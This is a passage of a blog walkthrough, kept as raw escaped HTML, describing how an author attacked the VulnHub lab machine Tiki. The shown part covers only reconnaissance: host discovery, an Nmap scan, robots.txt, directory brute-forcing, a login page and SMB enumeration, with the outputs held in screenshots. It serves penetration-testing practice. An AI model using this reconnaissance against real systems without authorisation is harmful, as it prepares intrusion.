data-original-height=&quot;256&quot; data-original-width=&quot;639&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgAO-6_eJNTYPCK3HeXdvSMptkj7-4sVUSHsZqCfONrDDFQnkEIoclvotgfeV7Nl0zXLO4V9uhcXYDhr9IWYHQhgnoM1HSKYRSIjCSZxDNMnxnWT8BNFWmvXPy89zSQJc6V3HbrABspug-nX7S4qXyoPT0p6o98FOzCudqo13ZNl1oY4MHvwJRxp3c_xQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Tiki&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; Tiki can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/tiki-1,525/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/tiki-1,525/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VMware:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhFM8MqWndb7IIR0zruXzbk9EMgDj3K2qEfTjyZJEpvC_URYsqReAtuDulAdU4xpXnlwNpG6bVJyX0kjWM1ujXSaKfVDacOo5gLKIsvgWdzZjzkcu657yh9WFE16G4uKFAocWlVYKjJtz2WsSReZPlxeGmKsrI-hewWzbsIvvYlA_5m4gDIzKACFfF0WQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;640&quot; data-original-width=&quot;791&quot; height=&quot;512&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhFM8MqWndb7IIR0zruXzbk9EMgDj3K2qEfTjyZJEpvC_URYsqReAtuDulAdU4xpXnlwNpG6bVJyX0kjWM1ujXSaKfVDacOo5gLKIsvgWdzZjzkcu657yh9WFE16G4uKFAocWlVYKjJtz2WsSReZPlxeGmKsrI-hewWzbsIvvYlA_5m4gDIzKACFfF0WQ=w633-h512&quot; width=&quot;633&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- By the way, the initial page indicates the existence of user&amp;nbsp;&lt;b&gt;silky&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Netdiscover gives the IP 192.168.1.42:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgjyl9mLBkcDA12wSjMPKAr7bQKNiPdYDmB9xSsL2ES01ZXCa1hqyZmqXahn1ucS7sYqgeVgRhlRQ33BKY39Ndi8PIdmsh9qjX5yOO34kK05SjEa8BggO82E0RQW1Fr2KZnn67bhDZ3w0ZkvyUyrw2vlqXU-gGMRAznaJXvRVsjpApjE77bjlSpBaih3w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;45&quot; data-original-width=&quot;376&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgjyl9mLBkcDA12wSjMPKAr7bQKNiPdYDmB9xSsL2ES01ZXCa1hqyZmqXahn1ucS7sYqgeVgRhlRQ33BKY39Ndi8PIdmsh9qjX5yOO34kK05SjEa8BggO82E0RQW1Fr2KZnn67bhDZ3w0ZkvyUyrw2vlqXU-gGMRAznaJXvRVsjpApjE77bjlSpBaih3w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhAvbh0SVKdIa96NyjmAwCz5w6Fp9fNc8RSkLOFTCMhrnWzJFsAl8GVJbHb08jjnAOJ44sCbqR7TR9GT5nuYX0sMCWIy7BT59QA8KtLlaBMmzJg52ROsy9VrDHCBMv83JZ3JoVF1giZAV6j7cL6m3yPmBGyFi_mI0Po76n-yjEUK1tzKymAKgCF1KbpNQ&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;210&quot; data-original-width=&quot;822&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhAvbh0SVKdIa96NyjmAwCz5w6Fp9fNc8RSkLOFTCMhrnWzJFsAl8GVJbHb08jjnAOJ44sCbqR7TR9GT5nuYX0sMCWIy7BT59QA8KtLlaBMmzJg52ROsy9VrDHCBMv83JZ3JoVF1giZAV6j7cL6m3yPmBGyFi_mI0Po76n-yjEUK1tzKymAKgCF1KbpNQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning all ports with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjQtZvYXntjDwaMNqqe6MTYMqiaeTOX3cTWPXjmVH-PMnkt9tHJCN7HT__AbMNHye3QpfAf_nuBCgmLRGWKwnWcYId7R18ulEtp8Cmb2n1NJPzithb1uMg3pYGV1984IFEtEEUQpIEnmHsJUXz1qghup9Hf6sC690UwO6krMxyHNNPvsLP3qwr4kf9rfQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;261&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjQtZvYXntjDwaMNqqe6MTYMqiaeTOX3cTWPXjmVH-PMnkt9tHJCN7HT__AbMNHye3QpfAf_nuBCgmLRGWKwnWcYId7R18ulEtp8Cmb2n1NJPzithb1uMg3pYGV1984IFEtEEUQpIEnmHsJUXz1qghup9Hf6sC690UwO6krMxyHNNPvsLP3qwr4kf9rfQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 80 and reading &lt;b&gt;robots.txt&lt;/b&gt; there is a folder named &lt;b&gt;/tiki&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgorFg0PMSzVJ5zDPXIVC46y6xsf3JGJXLe_CdSnB7TCSnraUFBzs6d4F23ClLVmJebnHDzRc9pLWoOSLsm2XJVAqaBkXjxjNtmpiQ00jdqkA8lRFK4lx8pCitjld8uHaiV553IV70fuygmxazvg3L4THDsAQQaTE0t4d3FHhW4N2wyqr6ieVAzC9j0TQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;455&quot; data-original-width=&quot;727&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgorFg0PMSzVJ5zDPXIVC46y6xsf3JGJXLe_CdSnB7TCSnraUFBzs6d4F23ClLVmJebnHDzRc9pLWoOSLsm2XJVAqaBkXjxjNtmpiQ00jdqkA8lRFK4lx8pCitjld8uHaiV553IV70fuygmxazvg3L4THDsAQQaTE0t4d3FHhW4N2wyqr6ieVAzC9j0TQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgxusPoSDVLy0p23FLTxXgrnb9wowBpvrQjsIaEK8C0oDlS7sMtQCWVTGSZC8FsO_AekvB3ZZYyhUEza3Z5yBEH_Psu_d171t6Jrdr8ff5Lisqb6iPna0uF_9xPLnqC-smzNqZAANm8aTrsZc2OJ-bKGWhUlMZzsVshP6sj-RteGhIxZej1eFyyG7WKZg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgxusPoSDVLy0p23FLTxXgrnb9wowBpvrQjsIaEK8C0oDlS7sMtQCWVTGSZC8FsO_AekvB3ZZYyhUEza3Z5yBEH_Psu_d171t6Jrdr8ff5Lisqb6iPna0uF_9xPLnqC-smzNqZAANm8aTrsZc2OJ-bKGWhUlMZzsVshP6sj-RteGhIxZej1eFyyG7WKZg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgxusPoSDVLy0p23FLTxXgrnb9wowBpvrQjsIaEK8C0oDlS7sMtQCWVTGSZC8FsO_AekvB3ZZYyhUEza3Z5yBEH_Psu_d171t6Jrdr8ff5Lisqb6iPna0uF_9xPLnqC-smzNqZAANm8aTrsZc2OJ-bKGWhUlMZzsVshP6sj-RteGhIxZej1eFyyG7WKZg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;172&quot; data-original-width=&quot;372&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgxusPoSDVLy0p23FLTxXgrnb9wowBpvrQjsIaEK8C0oDlS7sMtQCWVTGSZC8FsO_AekvB3ZZYyhUEza3Z5yBEH_Psu_d171t6Jrdr8ff5Lisqb6iPna0uF_9xPLnqC-smzNqZAANm8aTrsZc2OJ-bKGWhUlMZzsVshP6sj-RteGhIxZej1eFyyG7WKZg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting the web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhb9-EPNAIytGVzSo19os9vlROqah1d5TVrhf5A26nOaRSrLjZCHdqoVFmSykgzC9fpmjanv3Wd2noUwfMInE7jv_g5g9bXgK8msjJhFGnbcn1Mq99yLP1udLq1oLgUAsz48CRcVjMHj3sYzCX3ezJlGJAu8DihGSyY0psspbQbsSerwXDe_f74In67bA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;492&quot; data-original-width=&quot;631&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhb9-EPNAIytGVzSo19os9vlROqah1d5TVrhf5A26nOaRSrLjZCHdqoVFmSykgzC9fpmjanv3Wd2noUwfMInE7jv_g5g9bXgK8msjJhFGnbcn1Mq99yLP1udLq1oLgUAsz48CRcVjMHj3sYzCX3ezJlGJAu8DihGSyY0psspbQbsSerwXDe_f74In67bA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;- Browsing the web server:&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgH6hxwcytvbY1LrgDAywDgNXEx5ST5iQ5NgHxejeJiofAwjaAnNjtDfu3dGUon1CK5kd4_x6myMA6O4pvRIv1J-DaA3R2J7eMZtU3cyTPsKYBr7-O7w5OG9ByUYKcz3gzCV1nREWES4q_vdCbYB0RNKxB_ASi4nehVWHQXnhW3iz-wCppl5m4qXA0V3Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;239&quot; data-original-width=&quot;684&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgH6hxwcytvbY1LrgDAywDgNXEx5ST5iQ5NgHxejeJiofAwjaAnNjtDfu3dGUon1CK5kd4_x6myMA6O4pvRIv1J-DaA3R2J7eMZtU3cyTPsKYBr7-O7w5OG9ByUYKcz3gzCV1nREWES4q_vdCbYB0RNKxB_ASi4nehVWHQXnhW3iz-wCppl5m4qXA0V3Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/tiki&lt;/b&gt; it redirects to &lt;b&gt;/tiki-index.php&lt;/b&gt;, where we can acces to a &lt;b&gt;Login&lt;/b&gt; form:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiF6TmkvxLOsPjKKMlO1Pi8qnc4KUFFp3RxzRSfBsO4Wk1BL8IzN-iQhJpX3ZKlwu6fYVhZiT9YwaA758VIpVLxy-NBdPsoMiPv8AJfUZPFQqUCpdMGdtRP4Jnp4U1nwkPNXsx4NHaIp6LIZ5p6PI4vU-Mtsvze3dq2FXh_ajkKXqCjYqkLJP7GbgSspg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;334&quot; data-original-width=&quot;620&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiF6TmkvxLOsPjKKMlO1Pi8qnc4KUFFp3RxzRSfBsO4Wk1BL8IzN-iQhJpX3ZKlwu6fYVhZiT9YwaA758VIpVLxy-NBdPsoMiPv8AJfUZPFQqUCpdMGdtRP4Jnp4U1nwkPNXsx4NHaIp6LIZ5p6PI4vU-Mtsvze3dq2FXh_ajkKXqCjYqkLJP7GbgSspg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhu8uQ8eGgEPHG7jo57jotEnXRz-YQ0G6AklK-S1iRW3Ea4LsQ06n94IECbg4cTY4ecTiiWUNjoT3pQxG1wpJx87t4GJghKL2MKSH_4pLR4Ag_MNKJczz8V8rdzY5mYh0HKmyjehw-sFmSERuABrsuRBALGhMCqwG0NYxneDMYry0wrwdxpmfsL05cvNg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;408&quot; data-original-width=&quot;627&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhu8uQ8eGgEPHG7jo57jotEnXRz-YQ0G6AklK-S1iRW3Ea4LsQ06n94IECbg4cTY4ecTiiWUNjoT3pQxG1wpJx87t4GJghKL2MKSH_4pLR4Ag_MNKJczz8V8rdzY5mYh0HKmyjehw-sFmSERuABrsuRBALGhMCqwG0NYxneDMYry0wrwdxpmfsL05cvNg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Enumerating with &lt;b&gt;enum4linux&lt;/b&gt; we find user &lt;b&gt;silky&lt;/b&gt; and shared folder &lt;b&gt;Notes&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a 